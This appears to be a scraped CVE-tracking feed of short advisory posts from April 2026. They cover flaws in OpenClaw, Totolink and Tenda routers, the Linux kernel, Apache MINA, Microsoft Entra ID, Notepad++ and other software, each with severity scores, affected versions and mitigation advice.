- CVE-2026-5965 - 6.34 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-5965)
- CVE-2026-41179 - 5.98 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41179)
- CVE-2026-40887 - 4.56 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-40887)
- CVE-2026-38834 - 3.22 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-38834)
- CVE-2026-41176 - 2.79 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41176)
- CVE-2026-21571 - 1.10 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21571)
- CVE-2026-6799 - 1.06 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-6799)
- CVE-2026-24467 - 0.76 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-24467)
- CVE-2026-41472 - 0.67 % (https://secdb.nttzen.cloud/cve/detail/CVE-2026-41472)
- CVE-2019-25714 - 0.60 % (https://secdb.nttzen.cloud/cve/detail/CVE-2019-25714)
updated 2026-04-28T18:28:53
2 posts
🟠 CVE-2026-42426 - High (8.8)
OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-42426 - High (8.8)
OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:22:28
2 posts
🟠 CVE-2026-41399 - High (7.5)
OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41399/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41399 - High (7.5)
OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41399/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:20:50
2 posts
🟠 CVE-2026-41394 - High (8.2)
OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41394/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41394 - High (8.2)
OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41394/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:18:46
2 posts
🟠 CVE-2026-41387 - High (7.8)
OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41387/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41387 - High (7.8)
OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41387/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:18:23
2 posts
🔴 CVE-2026-41386 - Critical (9.1)
OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41386/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-41386 - Critical (9.1)
OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41386/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:17:40
2 posts
🟠 CVE-2026-41384 - High (7.8)
OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41384/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41384 - High (7.8)
OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41384/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:17:19
2 posts
🟠 CVE-2026-41383 - High (8.1)
OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41383/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41383 - High (8.1)
OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41383/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:15:32
2 posts
🟠 CVE-2026-41378 - High (8.8)
OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41378/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-41378 - High (8.8)
OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41378/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T15:16:33.807000
1 posts
🟠 CVE-2026-7040 - High (7.5)
Text::Minify::XS versions from v0.3.0 before v0.7.8 for Perl have a heap overflow when processing some malformed UTF-8 characters.
The minify functions mishandled some malformed UTF-8 characters, leading to heap corruption.
Note that the minify_...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7040/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T12:10:53.103000
2 posts
Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID
Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.
**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-cvss-10-0-ssrf-vulnerability-in-entra-id-c-d-3-y-z/gD2P6Ple2L
Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID
Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.
**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-cvss-10-0-ssrf-vulnerability-in-entra-id-c-d-3-y-z/gD2P6Ple2L
updated 2026-04-28T09:34:20
1 posts
🚨 CVE-2026-7243: Critical OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Remote, unauthenticated RCE risk — public exploit out, no patch yet. Lock down management access & monitor for updates. https://radar.offseq.com/threat/cve-2026-7243-os-command-injection-in-totolink-a80-73a189fb #OffSeq #Vulnerability #RouterSecurity
##updated 2026-04-28T09:34:20
1 posts
⚠️ CRITICAL: CVE-2026-7248 in D-Link DI-8100 (fw 16.07.26A1) enables remote buffer overflow via 'fn' in CGI Endpoint. No patch available — restrict access & monitor for updates. Exploit code is public. https://radar.offseq.com/threat/cve-2026-7248-buffer-overflow-in-d-link-di-8100-798ac14e #OffSeq #DLink #Vuln #Infosec
##updated 2026-04-28T09:16:17.017000
1 posts
1 repos
updated 2026-04-28T03:31:36
2 posts
🛑 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7202). Public exploit available. Restrict remote access & disable WPS until patched! https://radar.offseq.com/threat/cve-2026-7202-os-command-injection-in-totolink-a80-9229772f #OffSeq #IoTSecurity #vulnerability #CVE20267202
##🔴 CVE-2026-7202 - Critical (9.8)
A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injec...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7202/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T03:31:36
2 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) suffers from OS command injection (CVE-2026-7203). Remote, unauthenticated attackers can fully compromise affected routers. No patch confirmed — disable remote mgmt & isolate. https://radar.offseq.com/threat/cve-2026-7203-os-command-injection-in-totolink-a80-b3a02d32 #OffSeq #Vuln #IoTSec
##🔴 CVE-2026-7203 - Critical (9.8)
A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os comma...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7203/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🟠 CVE-2026-27785 - High (8.8)
Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27785/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🔴 CVE-2026-40976 - Critical (9.1)
In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40976/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T00:31:47
1 posts
🟠 CVE-2026-7160 - High (8.8)
A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed fro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7160/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:12
2 posts
🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7156, CVSS 9.3). Exploit is public — remote attackers can fully compromise devices. Disable remote mgmt & restrict access now. https://radar.offseq.com/threat/cve-2026-7156-os-command-injection-in-totolink-a80-8abcd97a #OffSeq #CVE20267156 #IoTSecurity
##🔴 CVE-2026-7156 - Critical (9.8)
A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument HTTP results in os command injection. The att...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7156/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:12
1 posts
🟠 CVE-2026-7151 - High (8.8)
A vulnerability was determined in Tenda HG3 2.0. Impacted is the function formUploadConfig of the file /boaform/formIPv6Routing. This manipulation of the argument destNet causes stack-based buffer overflow. It is possible to initiate the attack re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7151/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:12
1 posts
🔴 CVE-2026-7153 - Critical (9.8)
A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sys_in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7153/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:31:02
1 posts
🟠 CVE-2026-30350 - High (7.5)
An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30350/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T21:30:50
1 posts
🟠 CVE-2026-31662 - High (7.5)
In the Linux kernel, the following vulnerability has been resolved:
tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG
The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements
bc_ackers on every inbound group ACK, even when the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31662/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:21:52.070000
1 posts
🟠 CVE-2026-6741 - High (8.8)
The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 5.4.1. This is due to a missing authorization check in the execute() method of the con...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6741/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:21:52.070000
1 posts
🔴 CVE-2026-7152 - Critical (9.8)
A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument telnet_enabled leads to os c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7152/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:20:48.030000
1 posts
🔴 CVE-2026-31637 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
rxrpc: reject undecryptable rxkad response tickets
rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then
parses the buffer as plaintext without checking whether
cry...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31637/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:17:17.613000
1 posts
🔴 CVE-2026-31659 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: reject oversized global TT response buffers
batadv_tt_prepare_tvlv_global_data() builds the allocation length for a
global TT response in 16-bit temporaries. When a ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31659/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:16:58.960000
1 posts
🔴 CVE-2026-31657 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
batman-adv: hold claim backbone gateways by reference
batadv_bla_add_claim() can replace claim->backbone_gw and drop the old
gateway's last reference while readers still follow ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31657/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:16:43.370000
1 posts
🟠 CVE-2026-31656 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat
A use-after-free / refcount underflow is possible when the heartbeat
worker and intel_engine_park_heartbeat() ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:16:12.663000
1 posts
🟠 CVE-2026-31652 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mm/damon/stat: deallocate damon_call() failure leaking damon_ctx
damon_stat_start() always allocates the module's damon_ctx object
(damon_stat_context). Meanwhile, if damon_cal...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31652/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:14:35.180000
1 posts
🟠 CVE-2026-31650 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mmc: vub300: fix use-after-free on disconnect
The vub300 driver maintains an explicit reference count for the
controller and its driver data and the last reference can in theory...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31650/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:13:49.587000
1 posts
🔴 CVE-2026-31649 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix integer underflow in chain mode
The jumbo_frm() chain-mode implementation unconditionally computes
len = nopaged_len - bmax;
where nopaged_len = skb_headl...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:13:14.333000
1 posts
🟠 CVE-2026-31648 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
mm: filemap: fix nr_pages calculation overflow in filemap_map_pages()
When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I
encountered some very strange crash issu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:09:25.553000
1 posts
🔴 CVE-2026-31669 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix slab-use-after-free in __inet_lookup_established
The ehash table lookups are lockless and rely on
SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability
during RCU...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31669/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:08:54.307000
1 posts
🔴 CVE-2026-31668 - Critical (9.8)
In the Linux kernel, the following vulnerability has been resolved:
seg6: separate dst_cache for input and output paths in seg6 lwtunnel
The seg6 lwtunnel uses a single dst_cache per encap route, shared
between seg6_input_core() and seg6_output_...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31668/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:00:40.187000
1 posts
🟠 CVE-2026-31667 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
Input: uinput - fix circular locking dependency with ff-core
A lockdep circular locking dependency warning can be triggered
reproducibly when using a force-feedback gamepad with...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31667/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:00:27.157000
1 posts
🟠 CVE-2026-31666 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref()
After commit 1618aa3c2e01 ("btrfs: simplify return variables in
lookup_extent_data_ref()"), the...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31666/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T20:00:05.430000
1 posts
🟠 CVE-2026-31665 - High (7.8)
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_ct: fix use-after-free in timeout object destroy
nft_ct_timeout_obj_destroy() frees the timeout object with kfree()
immediately after nf_ct_untimeout(), without w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-31665/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T19:57:39.360000
2 posts
The diversity of advisory is key. Look at how good the advisory of GitHub is compared to the others.
##⚪️ Microsoft Issues Emergency Patch for Critical ASP.NET Vulnerability
🗨️ Microsoft has released an out-of-band update for ASP.NET Core. The patch fixes a critical vulnerability in the Data Protection cryptographic APIs that allowed unauthenticated attackers to obtain SYSTEM privileges by forging authentication cookies. The vulnerability is tracked as CVE-2026-40372 and…
##updated 2026-04-27T19:50:46.320000
1 posts
🟠 CVE-2026-42039 - High (7.5)
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a Range...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42039/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T19:18:46.690000
1 posts
🔴 CVE-2026-30352 - Critical (9.8)
A remote code execution (RCE) vulnerability in the /devserver/start endpoint of leonvanzyl autocoder commit 79d02a allows attackers to execute arbitrary code via providing a crafted command parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-30352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
2 posts
🚨 New security advisory:
CVE-2026-41635 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-41635-apache-mina-unauth-rce-via-deserialization
🔴 CVE-2026-41635 - Critical (9.8)
Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed.
The fix che...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
📰 Foxit PDF Reader Flaw (CVE-2026-5942) Could Lead to Information Disclosure
📄 Foxit PDF Reader users: A use-after-free flaw (CVE-2026-5942) has been disclosed. It can leak sensitive info and requires opening a malicious file. A patch is available. #Foxit #Vulnerability #CyberSecurity #PatchNow
##updated 2026-04-27T18:57:20.293000
2 posts
🔴 New security advisory:
CVE-2026-41409 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-41409-apache-mina-unauth-rce-via-deserialization
🔴 CVE-2026-41409 - Critical (9.8)
The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been exec...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41409/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
3 repos
https://github.com/llgsjsm/cve-2026-3008
Notepad++ Patches Critical Format String Injection Flaw
Notepad++ version 8.9.4 patches a critical format string injection vulnerability (CVE-2026-3008) that allow attackers to crash the application or leak sensitive memory data via malicious language packs.
**If you use Notepad++, update to version 8.9.4 immediately through the official website or built-in updater, especially if you use a non-English language pack. Only download language packs from the official Notepad++ source, never from forums or third-party sites.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/notepad-patches-critical-format-string-injection-flaw-w-m-g-l-s/gD2P6Ple2L
updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2025-69689 - High (8.8)
The Fan Control application V251 contains an improper privilege handling vulnerability in its Open File Dialog. The dialog processes user-supplied paths with elevated permissions, which can be exploited by a local attacker to perform actions with ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7100 - High (8.8)
A flaw has been found in Tenda F456 1.0.0.5. The impacted element is the function fromNatlimitof of the file /goform/Natlimit of the component httpd. Executing a manipulation can lead to buffer overflow. The attack may be launched remotely. The ex...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7100/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7099 - High (8.8)
A vulnerability was detected in Tenda F456 1.0.0.5. The affected element is the function formQuickIndex of the file /goform/QuickIndex of the component httpd. Performing a manipulation of the argument mit_linktype results in buffer overflow. The a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7099/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-5943 - High (7.8)
Document structural anomalies caused inconsistencies between page element relationships and internal index states. When scripts triggered document modifications, object reference validity was not properly maintained, leading to a crash when access...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5943/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-5940 - High (7.8)
Calling a function that triggers a UI refresh after removing comments via a script may access an invalidated object, leading to program crashes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5940/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7119 - High (8.8)
A vulnerability was detected in Tenda HG3 2.0. The impacted element is an unknown function of the file /boaform/formCountrystr. The manipulation of the argument countrystr results in os command injection. The attack may be performed from remote. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7119/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7098 - High (8.8)
A security vulnerability has been detected in Tenda F456 1.0.0.5. Impacted is the function fromDhcpListClient of the file /goform/DhcpListClient of the component httpd. Such manipulation of the argument page leads to buffer overflow. The attack ca...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7098/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
2 posts
⚠️ HIGH severity: Tenda F456 (v1.0.0.5) buffer overflow in httpd's fromPPTPUserSetting (CVE-2026-7080) enables remote code execution or DoS. No patch yet — restrict device exposure & monitor for updates. Details: https://radar.offseq.com/threat/cve-2026-7080-buffer-overflow-in-tenda-f456-6bb8799d #OffSeq #infosec #CVE20267080
##🟠 CVE-2026-7080 - High (8.8)
A security vulnerability has been detected in Tenda F456 1.0.0.5. This impacts the function fromPPTPUserSetting of the file /goform/PPTPUserSetting of the component httpd. Such manipulation of the argument delno leads to buffer overflow. The attac...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7080/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
⚠️ HIGH severity: CVE-2026-3868 affects Moxa EDR-8010 v1.0 routers. Remote attackers can trigger a DoS via HTTPS mgmt interface buffer overflow. No patch yet — restrict access & monitor for outages. https://radar.offseq.com/threat/cve-2026-3868-cwe-130-improper-handling-of-length--680be2d5 #OffSeq #Moxa #Infosec #ICS
##updated 2026-04-27T18:57:20.293000
2 posts
🛡️ CVE-2026-7081: HIGH-severity buffer overflow in Tenda F456 v1.0.0.5 (fromGstDhcpSetSer, httpd). Remote exploit possible, no patch yet. Limit remote access & watch for Tenda updates. Details: https://radar.offseq.com/threat/cve-2026-7081-buffer-overflow-in-tenda-f456-d90f75b6 #OffSeq #Vulnerability #Infosec #IoT
##🟠 CVE-2026-7081 - High (8.8)
A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. Remote exploitation...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7081/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
1 posts
🟠 CVE-2026-7078 - High (8.8)
A security flaw has been discovered in Tenda F456 1.0.0.5. The impacted element is the function fromSetIpBind of the file /goform/SetIpBind of the component httpd. The manipulation of the argument page results in buffer overflow. The attack can be...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7078/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-27T18:57:20.293000
2 posts
🚨CRITICAL: CVE-2026-42363 in GeoVision GV-IP Device Utility 9.0.5 exposes admin creds via UDP broadcast with weak encryption. Attackers on LAN can take full control. Limit access, avoid untrusted networks, and watch for patches. https://radar.offseq.com/threat/cve-2026-42363-cwe-656-reliance-on-security-throug-65391bf4 #OffSeq #infosec #IoTSecurity
##🔴 CVE-2026-42363 - Critical (9.3)
